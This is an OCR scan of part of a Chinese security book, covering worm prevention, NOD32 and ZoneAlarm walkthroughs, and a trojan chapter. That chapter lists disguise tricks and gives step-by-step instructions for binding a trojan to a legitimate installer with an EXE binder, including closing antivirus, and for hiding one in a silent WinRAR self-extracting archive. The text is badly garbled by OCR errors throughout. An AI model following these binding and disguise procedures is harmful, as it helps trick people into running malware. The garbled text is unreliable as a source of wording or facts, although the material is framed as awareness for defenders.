网 络 ， 并 试图 在 Internet 网 络 上 下 载 执行 为 一 蠕虫 病毒 ， 和 直接 降低 系统 安全 设置 , 给 用 户 下 
弟 操 作 市 来 极 大 的 隐患 。 

2. 安 莱 普 蠕虫 病毒 

“ 安 羔 普 ”(Worm.Anap.b〉 贤 虫 病毒 通过 电子 邮件 传播 ， 利 用 用 户 对 知名 品牌 的 信任 
心理 , 伪装 成 某 些 知 名 I 开 厂 商 ( 如 微软 、IBM 等 ) 给 用 户 狂 发 带 毒 邮件 ,诱骗 用 户 打 开 附 
件 以 致 中 毒 ， 病 毒 运行 后 会 弹出 一 个 窗口 ， 内 容 提示 为 “这 是 一 个 里 中 病 毒 ”。 同 时 ， 该 病 
毒 会 在 系统 临时 文件 和 个 人 文件 夹 中 大 量 收集 邮件 地 址 ， 并 循环 发 送 邮件 。 


大 家 在 查看 自己 的 电子 邮件 时 ， 一 定 要 确定 发 件 人 是 否 熟悉 之 后 再 打开 ， 
以 防 感 染 这 种 邮件 传播 病毒 。 


虽然 利用 邮件 进行 传播 一 直 是 病毒 传播 的 主要 途径 ， 但 随 着 网 络 威胁 种 
类 的 增多 和 病毒 传播 途径 的 多 样 化 ， 某 些 蠕虫 病毒 往往 还 携带 者 “间谍 软件 ” 
和 “网 络 钓鱼 ”等 不 安全 因素 。 因 此 ， 一 定 要 注意 即时 升级 自己 的 杀毒 软件 
到 最 新 县 本， 注意 打开 邮件 监控 程序 ， 让 自己 的 上 网 环境 更 安全 。 


44.2 网 络 里 虫 病毒 的 全 面 防 学 


在 对 网 络 贤 虫 病毒 有 了 一 定 的 了 解 之 后 ， 下 面 主要 讲述 一 下 应 该 如 何 从 企业 和 个 人 两 
种 角度 做 好 安全 防范 。 

(1) 企业 用 户 对 网 络 晴 虫 的 防范 

企业 在 充分 地 利用 网 络 进行 业务 处 理 时 ， 不 得 个 考虑 企业 的 病毒 防范 问题 ， 以 你 证 关 
系 企业 命运 的 业务 数据 完整 性 不 被 破坏 。 企 业 防 治 蠕虫 病毒 时 需要 考虑 儿 个 问题 ， 病毒 的 
但 杀 能 力 ， 病 毒 的 监控 能 力 ， 痢 病毒 的 反应 能 

推荐 的 企业 防范 烯 虫 病毒 的 全 略 如 下 。 

1) 加 强 安全 管理 ， 提 高 安全 意识 。 由 于 蟾 病毒 是 利用 Windows 系统 漏洞 进行 攻击 
的 ， 因 此 ， 要 求 网 络 管理 员 尽 力 在 第 一 时 间 保 证 系统 和 应 用 软件 的 安全 性 ， 保 证 各 种 操作 
系统 和 应 用 软件 的 及 时 更 新 。 随 看 Windows 系统 各 种 漏洞 的 不 断 涌 现 ， 要 想 一 元 永 逸 地 获 
得 一 个 安全 的 系统 环境 儿 乎 不 可 能 。 而 作为 系统 负载 重要 数据 的 企业 用 户 ， 其 所 面临 攻击 
的 危险 也 将 越 来 越 大 ， 这 融 要 求 企业 的 管理 水 平和 安全 意识 也 必须 越 来 越 高 。 

2) 建立 病毒 检测 系统 。 能 够 在 第 一 时 间 检 测 到 网 络 开 疝 和 病毒 攻击 。 

3) 建立 么 急 啊 应 系统 ， 尽 量 降低 风险 。 由 于 里 中 病毒 爆发 的 突然 性 ， 可 能 在 被 发 现时 
己 蕊 延 到 了 整个 网 络 ， 建 立 一 个 紧急 啊 应 系统 丈 显 得 非常 必要 ， 能 够 在 病毒 爆发 的 第 一 时 
间 捉 供 解 决 方案 。 

4) 建立 灾难 备份 系统 。 对 于 数据 库 和 数据 系统 ， 必 须 采 用 定期 备份 、 多 机 备份 措施 ， 
防止 意外 灾难 下 的 数据 丢失 。 
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5) 对 于 局 域 网 而 言 , 可 安装 防火 墙 式 防 儿 计算 机 病毒 产品 , 将 病毒 隔离 在 局 域 网 之 外 ; 
或 对 邮件 服务 右 实 施 监 挖 ， 切 断 市 毒 邮件 的 传播 途径 ， 或 对 局 域 网 省 理 员 和 用 户 进 行 安全 
者 训 ;， 建立 局 域 网 内 部 的 升级 系统 ， 包 括 各 种 操作 系统 的 补丁 升级 ， 各 种 着用 的 应 用 软件 
升级 ， 各 种 杀毒 软件 病毒 库 的 升级 等 。 

(2) 个 人 用 户 对 网 络 虹 虫 的 防范 

对 于 个 人 用 户 而 言 ， 威 胁 大 的 晴 虫 病毒 采取 的 传播 方式 一 般 为 电子 邮件 以 及 恶意 网 页 
等 。 下 面 介 绍 一 下 个 人 应 该 如 何 防范 网 络 蠕虫 病毒 。 

1) 安装 合适 的 东 毒 软件 。 网 络 贤 虫 病毒 的 发 展 已 经 使 传统 的 杀毒 软件 的 “文件 级 实时 
监控 系统 ” 沙 伍 ， 儿 毒 软件 必须 疝 内 存 实时 监控 和 邮件 实时 监控 发 展 ， 网 页 病毒 也 使 用 户 
对 杀毒 软件 的 要 求 越 来 越 高 。 

2) 经 名 升级 病毒 库 。 杀 毒 软件 对 病毒 的 得 杀 是 以 病毒 的 特征 但 为 依据 的 ， 而 病毒 层 出 
不 穷 ， 尤 其 是 在 网 络 时 代 ， 晴 里 病毒 的 传播 速度 快 、 变 种 多 ， 上 所 以 必须 随时 更 痢 病 毒 库 ， 
以 便 奋 杀 最 新 的 病毒 。 

3) 提高 防 杀毒 意识 。 不 要 轻易 点 击 陌 生 的 站 点 ， 有 可 能 里 面 就 含有 恶意 代码 。 当 运行 
IE 时 ， 在 “Internet 区 域 的 安全 级 别 ” 选 项 中 把 安全 级 别 由 “中 ” 改 为 “高 ” 因为 这 一 类 
网 页 主要 含有 恶意 代码 的 ActiveX 或 Applet、JavaScript 网 页 文件 ,在 正 设置 中 将 ActiveX 
插件 和 控件 、Java 脚本 等 全 部 禁止 ， 如 下 图 所 示 ， 以 大 大 减少 被 网 页 有 恶 总 代码 感 染 的 概率 。 
不 过 以 后 在 浏览 网 页 过 程 中 ， 这 样 做 有 可 能 会 使 一 些 正 常 应 用 ActiveX 的 网 站 无 法 浏览 。 
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站 EJ 
@@ 二 V 


单 | hctiweX 控件 自动 提示 
Interret 本 地 受信 任 的 站 受 限 制 的 站 
Intrar 中 总 


et 


四 月 用 
恒 | 对 标记 为 可 安全 执行 脚本 的 ActiveX 控件 执行 脚本 * 
图 禁用 
回忆 用 
提示 
司 | 对 未 标记 为 可 安全 执行 脚本 的 ActiweX 控件 初始 化 并 扶 


ee @ 禁用 推 荐 ) 
该 区 域 的 安全 级 别 人 @ 启用 不 安全 ) 
自 定义 


自 定义 设置 Ee 
定 尺 设 熏 二 i 脚本 行 

- 委 和 十 必 蕊 置 ， 请 单 击 “ 自 定义 级别” = 

-村民 几 风量 二 洁 昌 宇和 神 spp" 


Internet 站 点 (S】 


地 so 


本 重新 启动 Internet Explorer 之 后 生效 


回 启用 保护 模式 (要求 重新 启动 Internet Explorer) 加 ) 
自 定 级 别 忆 .| 默认 级 别 中) 


将 所 有 区 域 重 针 为 默认 级 别 外 ) 


中 置 自 定 义 设置 
第 置 为 R) : [中 -高 _ 怀 认 值 ) - 


双击 “控制 面板 " 窗口 国 单 击 “ 自 定义 级 别 ” 图 把 “Activex 控 件 和 单 击 “ 确 定 ”按钮 。 
中 的 “Internet 选 项 " 图 标 。 按 钮 。 插件 ”中 的 选项 都 设 为 


禁用 。 


4) 不 随意 得 看 陌生 邮件 。 一 定 不 要 打开 扩展 名 为 VBS、SHS 或 PIF 的 邮件 附件 。 这 
些 扩展 名 从 未 在 正常 附件 中 使 用 过 ， 但 它们 经 常 被 病毒 和 蠕虫 使 用 。 
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病毒 攻防 


范 工具 


杀毒 软件 也 是 病毒 防范 必 不 可 少 的 工具 ， 随 看 人 们 对 病毒 危害 的 认识 ， 杀 毒 软件 也 逐 
渐 补 重视， 各 式 各 样 的 杀毒 软件 如 雨后春笋 般 出 现在 市 场 中 。 


4.5.1 ”用 NOD32 碍 杀 病 毒 


NOD32 是 近 几 年 中 迅速 嘱 起 的 一 球 杀 毒 软件 。 以 轻巧 易 用 、 惊 人 的 检测 速度 及 卓越 的 
性 能 深 受 用 户 青 睐 ， 成 为 许多 用 户 和 IT 专家 的 首选 。 并 且 经 多 家 检测 权威 确认 ，NOD32 
在 速度 、 精 确 度 和 各 项 表现 上 已 拥有 多 项 全 球 纪 录 。 

在 使 用 NOD32 进行 查 杀 病毒 之 前 ， 最 好 先 升级 一 下 病毒 库 ， 这 样 才能 保证 杀毒 软件 
对 新 型 病毒 的 查 杀 效果 。 更 新 病毒 库 之 后 ， 就 可 以 对 计算 机 进行 最 第 用 的 查 杀 病毒 操作 了 。 

有 具体 的 操作 步骤 如 下 。 


STEP01: 运行 NOD32 STEP02: 对 计算 机 进行 扫描 


(©@) ESET NOD32 Antivirus 


| ESETNOD32 ANTIVIRUS 7 


“0 
已 清除 对 傅 : 0 
扫 钦 : C:\SRECYCLE.,BIN\S-1-5-21-1728124532-1908955518-41546,,,\ibfontconfig-1,dIl 
打开 扫 搞 


操作 系统 不 @ 所 有 扫 栏 结束 后 计算 机 不 采取 任何 操作 


是 最 新 的 
该 计算 机 并 未 安装 所 有 可 用 的 操作 系统 更 新 。 请 通过 Windows Update 服务 亡 装 天 失 的 
新 。 有 关 详 细 信息 ， 请 单 击 此 处 。 
常用 人 @ 运行 智 详 描 
did 全 2 
由 ESET 社交 媒体 扫描 程序 扫描 USB、DVD、CD 和 其 他 可 移动 右 
8 启用 游戏 模式 sa 
脑 扫 拱 日 去 
效 计算 机 扫 卑 设置 .. 


ESET NOD32 Antivirus 未 激活 
多 ESET NOD32 Antivirus 状态 : 防护 已 启 囊 ,无 使 用 系统 资源 的 | 
FT 


双击 NOD32 图 标 , 打开 单 击 “ 计 算 机 ”默认 进行 智能 扫描 ， 也 可 单 击 “ 自 定义 扫描 ” 链接 ， 
NOD32 主 界面 。 扫描 ”选项 卡 。 任意 选取 扫描 的 目标 范围 。 
STEP03: 查看 扫描 结果 STEP04: 查看 病毒 详细 信息 


ie) ESET NOD32 Antivirus 


”= (©) 计算 机 扫 搞 - ESET NOD32 Antivirus 
ESETNOD32 AINTIVIRUS 7 


怪 摘 进展 


目标 : E\ 娃 客 资 料 \ 泽 宇 病 委 制 造 机 \ 皇 宇 病 雪 齐 造 机 \ 枉 宇 病 雪 剂 造 宙 .exe 
尽 染 数量 :5 


E%\ 桂 客 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5.exe > NSIS > Fluxay46.mht > MIME - 正常 ( 未 执行 内 部 扫 洪 ) 。 
BE\ 蛙 客 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5.exe > NSIS > faq.mht > MIME - 正常 ( 未 执行 内 部 扫 迫 ) 

E\ 圣 窜 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5,exe > NSIS > form,mht > MIME - 正常 ( 未 执行 内 部 扫 搭 ) 

E\ 蛙 客 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5.exe > NSIS > http,mht > MIME - 正常 ( 未 执行 内 部 扫 撕 ) 

E'\ 轩 寡 资料 \Setup_Fluxay5.zip > ZIP > Setup_Fluxay5.exe > NSIS > ipc.mht > MIME - 正常 〈 未 执行 内 部 失 演 ) 

E\ 肤 客 资 料 \setup_Fluxay5,zip > ZIP > Setup_Fluxay5.exe > NSIS > remote.mht > MIME - 正常 ( 未 执行 内 部 扫 落 ) 

E\ 墨 窜 资 料 \Setup_Fluxay5,zip > ZIP > Setup_Fluxay5.exe > NSIS > sql.mht > MIME - 正常 (未 执行 内 部 把 芍 ) 

EN\ 有 桂香 资 彬 NSetup_Fluxay5,zip > ZIP 


QQ 智能 扫 摘 令 


可 移动 磁盘 扫 摘 重复 上 次 扫 
扫 撕 USB、DVD、CD 和 其 他 可 称 动 磁 六 上 次 扫 六 的 日 期 和 
主 2013/11/14 13:33:26 


- > Setup_Fluxay5.exe > NSIS > NTLM,EXE - 可 散 是 Win32/Small.EHYSOHG 特洛伊 ] 引 
Et\ 畦 客 资料 \sniffer pro 下 载 V4_7_5 中 文 破解 版 sniffer 抓 包工 具 - p 下 载 闪 ,mht > MIME - 正常 ( 未 执行 内 部 扫 撕 】 ~ | 
| 


< | 
[vj 滚动 扫 葡 日 志 


| + 


脐 扫 控 日 志 
炎 计算 机 扫 税 设置 . 


单 击 “ 自 定义 扫描 ”， 单 击 “ 在 新 窗口 ”在 “计算 机 扫描 ”窗口 中 可 查看 详细 的 扫描 过 程 以 
显示 扫描 结果 。 中 打开 扫描 ”链接 。 及 病毒 的 详细 信息 。 
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客 志 
PE 工具 人 攻 了 


合 人 他 他 


~ 


STEP05: 启用 防护 STEP06: 查看 日 志文 件 等 信息 


(©) ESET NOD32 Antivirus 


ESET NOD32 ANTIVIRUS7 


ie) ESET NOD32 Antivirus 


ESET NOD32 ANTIVIRUS7 


- 


日 志文 件 下 
隔 高 区 
隔离 的 对 傅 数 : 99 
©@ ESET SysInspector 
计算 机 状态 快照 数 :0 


上 一 个 忆 录 : 2013/11/14 13:16:46 


云 行进 程 
ESET Live Grid 支持 的 信誉 信息 
@ 提交 文件 以 供 分 析 (ESET SysRescue 
ESET 实验 室内 的 分 析 一 > ”创建 收复 CD 


四 ESET 社交 媒体 扫 摘 程序 
保护 您 的 社交 网 络 上 的 帐户 


单 击 “设置 ”选项 卡 , 根据 提示 启用 防护 。 单 击 “ 工 具 ” 选 项 卡 ， 查 看 日 志文 件 ， 设 置 计划 任 
务 ， 查 看 防护 统计 以 及 被 隔离 的 文件 等 信息 。 


和 5.2 ”免费 的 个 人 防火 场 loneAMlarm 


ZoneAlarm 强大 的 双 回 防火 声 能 够 监控 个 人 计算 机 和 互联 网 传 入 和 传 出 的 流量 ， 能 够 
阻止 黑客 对 一 台 个 人 计算 机 友 动 攻击 并 和 急 取 信息 。 同 时 ，ZoneAlarm 的 强大 反 病 毒 引擎 可 
检测 和 阻止 间谍 软件 、 特 洛 仇 木马、 蠕虫 、 伪 尸 病毒 和 rootkit。 

下 和 面 介绍 ZoneAlarm 的 使 用 ， 有 具体 操作 步骤 如 下 。 


STEP01: 运行 ZoneAlarm 主 程序 STEP02: 打开 防火 墙 界面 


阿 zoneAlarm E> | 
ZONEALARM Sl Check Point ZONEALARM S| Check Point 


SS - | SS 
| 
Free Antivirus + Firewall i es Free Antivirus + Firewall 


Traffic to anfl from your Your computer is protected Application Control 
i fr i Biocks dangerous behaviors and Whauthorized internet transoaissions 


mputer is mpnitored for om nalicious sites 
avior, attempting to steal your 
identity and data, 


pO 


单 击 “FIREWALL” (防火 墙 ) 图 标 。 单 击 “ON” 按 钮 单 击 "xxaccess attempts 
开启 防火 墙 功 能 。 blocked” 链 接 。 


出 o%6 


STEP03: 防火 墙 设置 


ZoneAlarm 


Alerts amd Logs 


Alert Events Shown 


© High 


vediun Show only hieh rated 


alerts. 


BEBvent Logging 


画 on 


DD of Event logsins is enabiled. 


Program Loggeing 


D righ 
 ¥ediun 
© off 


Log only high-rated progra= alerts. 


定 警报 级 别 、 是 否 开启 事件 日 志 以 及 程序 警报 日 
级 别 。 


STEP05: 病毒 防护 设置 


设 
ei 
7CAN 


ZONEALARM | Ct i | 


Free Antivirus + Firewall seen Updete Tune-up Toole Help | pg oye 
-xm COMPUTER IS SECURE 
各 ANTIVIRUS 


ntivirus 县 Anti-spyware 
et 5 and res 5DYWware 
S39 virus (es) have baer dete 


圆 Real-tine Protection 


Scan Results 


0 files scanned 
89 virus(es) found 
Last Nert 14 files 
Antivirus Nov 21， Wov 28, 2013 = guarantined 
日 SCun 2013 Scan Nog ~ 


车 -hsdulerz 


Antivirus Today at Today at | Update Now | 
Update 09:54 AX 04:27 PX 本 二 吕 间 | 


STEP04: 返 


ZE 
| 
| ZONEALARM 

Free Antivirus + Firewall 


回 主 春 面 
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FP= Tr ~] Xx 
CheskPoint 


Scan Update Tune-up Tools Help 


| 本 mm COMPUTER IS SECURE 


| Your computer is protected 
from viruses and spyware. 
| 


Yiew Details 


| Traffic to and from your 
| computer is monitored for 
suspicious behavior, 


IDENTITY & DATA 


Your computer is protected 
from malicious sites 
attempting to steal your 
identity and data, 


单 击 “ANTIVIRUS ” (病毒 防护 ) 图 标 。 
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本 章 主要 介绍 了 木马 攻防 技巧 ， 其 中 包括 : 木马 的 伪装 手段 曝光 、 木 马 捆 
绑 技 术 捆 缚 、 木 马 加 壳 与 脱 过 工具 以 及 木马 清除 工具 的 使 用 等 ， 可 有 效 帮 助 用 
户 预防 自己 的 计算 机 中 木马 病毒 ， 从 而 保护 系统 的 安全 性 。 


〇 木马 的 伪装 与 生成 曝光 


〇 木马 加 这 与 脱 碗 工具 


O 木马 清除 工具 


霹 ”第 5 章 
木马 攻防 


5.1 森马 的 伪 委 与 生 克 曝光 
黑客 们 往往 会 使 用 多 种 方法 来 伪装 木马 ， 降 低 用 户 的 警惕 性 ， 从 而 实现 欺骗 用 户 。 为 


让 用 户 执 行 木 号 程序 ， 黑 客 须 通过 各 种 方式 对 木马 进行 伪 疤 ， 如 伪 疙 成 网 页 、 图 片 、 电 子 
书 每 。 了 解 黑 客 伪 装 木 马 的 各 种 方式 ， 用 户 才 能 避免 上 当 受 骗 。 


5.1.1 木马 的 伪 沪 手段 曝光 


越 来 越 多 的 人 对 木马 的 了 解 和 防 范 意 识 的 加 强 在 一 定 程度 上 抑制 了 木马 传播 ， 为 此 ， 
木马 设计 者 开发 了 多 种 功能 来 伪 攻 本 马 ， 以 达到 降低 用 户 警 觉 ， 其 驹 用 刀 的 目的 。 

下 面 惑 来 详细 了 解 木马 的 第 用 伪 猴 方法 。 

1. 修改 图 标 

现在 有 些 木 马 可 以 将 木马 服务 奖 程 序 的 图 标 改 成 HTML、TXT、ZIP 等 各 种 文件 的 图 
标 ， 这 就 具备 了 相当 大 的 迷惑 性 。 不 过 ， 目 前 提供 这 种 功能 的 木马 还 很 少 抑 ， 并 且 这 种 伪 
闭 也 极 易 识破 ， 上 所 以 完全 不 必 担 心 。 

2. 冒充 图 片 文件 

这 是 许多 黑客 常用 来 欺骗 别人 执行 木马 的 方法 ， 束 是 将 木马 伪装 成 图 像 文件 ， 比 如 照 
厂 等 ， 应 该 说 这 样 是 最 不 合 好 辑 的 ， 但 却 使 最 多 人 中 招 。 只 要 入 侵 者 扮 成 “美眉 ”及 更 改 
服务 端 程序 的 文件 名 为 类 似 图 像 文 件 的 名 称 ， 再 假装 传送 照 族 给 受害 者 ， 受 害 者 就 会 立刻 
执行 它 。 

3. 文件 捆绑 

恶意 捆绑 文件 伪装 手段 是 将 木马 捆绑 到 一 个 安装 程序 上 , 当 用 户 在 进行 该 程序 安装 时 ， 
木马 就 偷 偷 地 潜入 系统 。 人 被 捆绑 的 文件 一 般 是 可 执行 文件 ( 即 EXE、COM 一 类 的 文件 )。 
这 样 做 对 一 般 人 的 迷惑 性 很 大 ， 而 且 即 使 他 以 后 重 装 系统 了 人 ， 如 果 他 的 系统 中 还 保存 了 那 
个 “游戏 ”， 束 有 可 能 再 次 中 招 。 

4. 出 错 信 息 显 示 

众所周知 ， 当 在 打开 一 个 文件 时 如 果 没 有 任何 反应 ， 很 可 能 这 个 文件 就 是 一 个 木马 程 
序 。 为 规避 这 一 缺陷 ， 已 有 设计 者 为 木马 提供 了 一 个 出 钳 显 示 功 能 。 访 功能 允许 在 服务 端 
用 户 打开 木马 程序 时 ， 弹 出 一 个 假 的 出 错 信 息 提 示 框 (内 容 可 上 自由 定义 )， 诸如 “文件 已 破 
坏 ， 无 法 打开 !”， 当 服务 端 用 户 信以为真 时 ， 木 马 已 经 悄悄 侵入 系统 。 

5. 把 木马 伪装 成 文件 夹 

把 木马 文件 伪装 成 文件 夹 图 标 后 ， 放 在 一 个 文件 夹 中 ， 然 后 在 外 面 再 套 上 三 四 个 空 
文件 来， 很 多 人 出 于 连续 点 击 的 习惯 ， 点 击 到 那个 伪 浅 成 文件 夹 木 马 时 ， 也 会 收 不 住 限 
标 而 继续 点 击 ， 这 样 木马 就 成 功 运 行 了 。 识 别 方法 : 不 要 隐藏 系统 中 已 知 文 件 类 型 的 扩 
展 名 称 。 
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6. 给 木马 服务 端 程序 更 名 

木马 服务 端 程序 的 命名 有 很 大 的 学 问 。 如 采 不 做 任何 修改 ， 束 使 用 原来 的 名 学， 谁 不 
知道 这 是 个 木马 程序 呢 ? 所 以 木马 的 命名 也 是 千奇百怪 。 不 过 大 多 是 改 为 与 系统 文件 名 差 
不 多 的 名 字 ， 如 来 用 尸 对 系统 文件 不 够 了 解 可 束 危 险 了 。 例如 有 的 木 与 把 名 字 改 为 window. 
exe， 还 有 的 就 更 改 一 些 后 级 名 ， 比 如 把 dl 改 为 dll 等 《注意 是 数字 “11” 而 非 英 文字 母 
i 

7. 上 自我 销毁 

由 于 在 服务 端 用 户 打 开 含有 木 瑟 的 文件 后 ， 木 马 会 将 目 己 复制 到 Windows 的 系统 文 
件 夹 中 (一 般 位 于 C:\Windows\system)。 一 般 来 说 ,原木 马 文件 和 系统 文件 夹 中 的 木马 文 
件 大 小 一 样 〈 捆 绑 文件 的 本 马 除 外 )， 只 要 在 近来 收 到 的 信件 和 下 载 的 软件 中 找到 原木 马 
文件 ， 再 根据 原木 马 的 大 小 在 系统 文件 夹 中 奉 找 相同 大 小 的 文件 ， 判 断 哪个 是 木马 文件 
印 可 。 


9.1.2 木马 捆绑 技术 上 明光 


墨客 可 以 使 用 木马 捆绑 技术 将 一 个 正 币 的 可 执行 文件 和 木马 拥 绑 在 一 起 。 一 旦 用 户 运 
行 这 个 包含 有 木马 的 可 执行 文件 ， 如 会 被 木马 控制 或 攻击 ， 下 面 主要 以 EXE 捆绑 机 曝光 木 
马 捆 绑 技 术 。 

EXE 捆绑 机 可 以 将 两 个 可 执行 文件 (EXE 文件 ) 捆绑 成 一 个 文件 ， 运 行 捆绑 后 的 文件 
等 于 同时 运行 了 两 个 文件 。 它 会 日 动 更 改 图 标 ,使 捆绑 后 的 文件 与 捆绑 前 的 文件 图 标 一 样 。 
具体 的 使 用 过 程 如 下 。 


STEP01: 双击 ExeBinder.exe 文件 STEP02: 指定 第 一 个 可 执行 文件 


EXE 舞 强 机 83 版 = 网 站 : wwnetthiel.net QQ :1050271066 


京 件 IF) ” 蝙 强 IE) 查看 rw) 工具 (T) 帮助 (H) [指定 第 一 个 可 了 协 行 浆 件 ] 
组 织 ” 。 国 打开。 肝 建 文件 志 | | 井 措 过 区 记 个 可 快 行 文件 ， 这 是 第 一 个 捆 绪 交 件 ， 所 好 后 的 妆 件 将 与 它 一 样 
二 - “ ET 


| 党 一 个 可 执行 六 件 的 睹 径 为 : 


否 通 上 
点 击 这 里 指定 第 一 个 可 雪 行 灾 件 


EweBinder,ewe 由 六 日 其 200 fl 22: 
应 用 程序 rh BO KB 


下 载 并 解压 EXE 文 件 捆绑 机 ， 打 开 相 应 文件 夹 后 双 “启动 EXE 捆 绑 机 后 单 击 “ 点 击 这 里 指定 第 一 个 可 执 
击 ExeBinder.exe 文 件 。 行文 件 ”按钮 。 
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< 和 5 剖 


STEP03: 选择 需要 执行 的 文件 


请 指定 第 一 个 可 执行 安 科 : 


| “ACED，ACDSeeprov62212lnclKe- | "| 如 上 七 二 AcDsee Pro wi 312 


| i ~ 于 建交 件 交 下 = 国 


i 国 计算 员 
电 本 地 E 量 (C1) 
上 本 地 三重 [0x) 
EE 本 地 感 盟 付 ) 
本 地 碟 和 二 [和 
Etudes 
明 MSN 上 的 “ 先 的 


ti 网 妆 到 | 
二 机 001ETFRGM 
国王 | 


ww 


变 填 儿 [N]: acdste-pro-6-32bitene 


打开 “请 指定 第 一 个 可 执 
行文 件 " 对 话 框 后 , 选择 需要 按钮。 
执行 的 文件 。 

STEP05: 指定 第 二 个 可 执行 文件 


EXE 揭 娜 机 &.3 版 - 网 站 : wwwnetthietnet QQ :1050271066 


[指定 第 二 个 梧 执行 女 件 ] 
中 是 第 一 个 可 失 行 艾 件 ， 这 是 第 二 个 拥 包 文件 ， 捆 包 后 的 六 件 持 看 直到 它 的 


第 二 个 可 执行 交 件 的 踢 径 为 : 
点 击 这 里 指定 第 二 个 可 执行 训 件 咱 


要 怒 息 ， 请 与 击 “ 下 一 区 ”， 


< 上 - 步 四 [Ko 性 | 


单 击 “点击 这 里 指定 第 二 个 可 执行 文件 ”按钮 。 


SE 查 有 生成 的 文件 路 径 


[指定 第 二 沾 可 所 行 交 件 ] 
请 措 定 第 一 个 可 执行 文件 这 是 第 二 个 捆 纪 妆 件 ， 捆 镍 后 的 文件 将 看 干 到 人 它 的 


第 一 个 可 执行 文件 的 属 簿 为 : 
点 击 这 里 指定 第 二 个 本 执行 文件 
要 维 续 ,请 点 击 “ 下 一 步 ”。 


指定 的 文件 路 径 出 现在 文本 框 中 ， 单 击 “ 下 一 步 
按钮 。 


单 击 “打开” 


木马 攻防 


STEP04: 查看 生成 的 文件 路 径 


EXE 氮 电机 8.3 版 - 网 站 : www.netthief.net QQ : 1050271066 


[指定 第 一 个 可 执行 交 件 ] 
a 这 是 第 一 个 手印 妆 件 ， 捆 纤 后 的 训 件 将 与 它 一 样 ， 


本 


点 击 这 里 撕 定 第 一 个 可 执行 文件 
要 准 红 ， 请 避 击 “下 一 步 ”。 


可 以 看 到 指定 的 文件 路 径 出 现在 文本 框 中, 单 击 “下 
一 步 ” 按钮 。 


STEP06: 选择 木马 文件 


mn 可 -mn 


国 打开 “请 指定 第 二 个 可 执行 文 国 单 击 “打开” 
件 对 话 框 后 a 选择 木马 文件 。 按钮 。 
STEP08: 指 


定 保存 路 径 


[指定 保存 路 径 ] 
请 指定 所 站 后 的 六 件 保存 至 精 h 里 。 


< 上 — 步 @) | 下 一 步 人 0 >| 取消 | 


单 击 “点 击 这 里 指定 保存 路 径 ”按钮 。 
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Bo = > 
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STEP09: 输入 文件 名 称 STEP10: 返回 “指定 保存 路 径 ” 对 话 框 


EXE 后 尘 机 83 版 - 网 站 : wwwnetthiefnet 器 Q : 1050271066 


[指定 保存 路 径 ] 
请 指定 播 儿 后 的 文件 怪 存 到 哪里 


保存 路 径 为 : 
:安装 过 件 %[ 批 轿 下载] ACDSeePro6. 1. 197_Lits 等 妃 


点 击 这 里 指定 保存 路 径 


要 诬 是 ， 请 点 击 “ 下 一 步 ”。 


《上 一 步 色 让 下 一 步 吧 > 


在 “文件 名 ”文本 框 中 输 指定 的 文件 路 径 出 现在 文本 框 中 ， 单 击 “ 下 一 步 " 
入 文件 名 称 。 按钮 。 

STEP11: 选择 版 本 STEP12: 捆绑 文件 

EXE 揭 柑 几 8.3 版 - 网 站 : wwwnetthief net QQ : 1050271066 | 


【选择 版 本 ] 
请 造 择 软 件 的 廓 可 类 型 。 


[ 亩 绪 区 件 ] 
开始 捆 儿 第 一 个 可 执行 训 件 与 第 二 个 可 执行 训 件 ， 生 成 揪 纤 后 的 文件 。 


点 击 这 里 开始 捆 弓 训 件 | 


选择 “普通 版 "或 “个 人 园 单 一 步 ” 单 击 “ 点 击 这 里 开始 捆绑 文件 ”按钮 。 
版 ( 推荐 )"。 按钮 。 


STEP13: 关闭 杀毒 软件 提示 STEP14: ”捆绑 文件 成 功 提 示 


EXE 手 洗 机 8.3 版 - 网 站 : wwnwmetthiefmet QQ :1050271066 


由 于 基 些 原因 ， “普通 版 ”很 可 能 会 被 杀毒 软件 查 杀 , 请 先 关 闭 杀 毒 软 
性 1 


单 击 “ 确 定 ” 按 钮 。 单 击 “确定 ”按钮 。 
STERLS: Dd tard 


捆绑 成 功 的 文件 。 


< 第 s 章 


木马 攻防 


人 @ 合 。 在 各 行 过 程 中 将 第 一 个 可 执行 文件 选择 为 一 个 正常 的 可 执行 文件 ， 第 二 个 


可 执行 文件 选择 为 木马 文件 ， 这 样 捆绑 后 的 文件 图 标 会 与 正常 的 可 执行 文件 四 
标 相同 。 


9.1.3 目 解 讨 捆绑 木马 星光 


随 看 网 络 安全 水 平 的 提高 ， 木 马 很 容易 就 锐 俘 儿 ， 因 此 木马 种 植 者 整 会 想 出 各 种 办 法 
伪装 和 隐藏 自己 的 行为 ， 利 用 WinRAR 自 解压 功能 捆绑 木马 就 是 手段 之 一 。 


STEP01: 准备 好 需要 捆绑 的 文件 STEP02: 将 所 选 文件 添加 到 压缩 文件 


文件 [中 ” 编 回 {E] ” 音 看 (V】 ”工具 (站 才 助 (H) 
误 织 ” 。 世 语 到 库 中 v 。 新 建立 件 训 


将 要 摘 绑 的 文件 放 在 同一 个 文件 夹 内 。 选 定 需要 捆绑 的 文件 后 右 击 ， 在 弹出 的 快捷 菜单 中 
选择 “添加 到 压缩 文件 ”命令 。 


常规 。 | 高 级 -| 选 硕 | 文件 [备份 | 时间 -| 注释 | 


压缩 文件 名 愉 NTFS 选项 

加 保存 交 件 安全 数据 眉 ) 
), owe 二 

站 回 保存 文件 流 数据 女 ) 


[本 竺 四 .|[ 沽 I0 并 项 换 文 特 ET 分 
压缩 文件 格式 压缩 丢 项 站 和 人 分 人 可 作 完 之 后 车 0 
而 RAR EE) 省 后 遇 除 提交 性 0L) 天 到 


同 7IP 习 ) 司 创建 自 毅 压 格式 压 纺 文件 寂 ) 
回 ] 创建 固 实 压 旨 文 件 后 ) 
压痛 方 芭 奖 ) 问 添 加 用 户 身 化 核验 信息 I) 
问 添 hn 和 记 来 
压痛 分 卷 大 小 , 字 节 V7) 口 | 列 试 压 编 广 E) 


[|] 了 ][( 毅 Wb |] 


勾 选 “创建 目 解压 格 陈 压缩 文件 ” 复 选 框 。 单 击 “ 自 解压 选项 ”按钮 。 
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PE > 
E> 工具 全 攻略 


合 人 他 他 


STEP05: 设置 安静 模式 STEP06: 切换 至 “文本 和 图 标 ” 选 项 卡 


蛋 时 模式 自 解压 文件 窗口 标题 各) 


see—pro-B-debit, exe 
忠和 解 包 到 临时 文件 夹 T) 
可 选 的 得 问心) 


acdsee—pro-B-32bit., exe 


询问 标题 上 


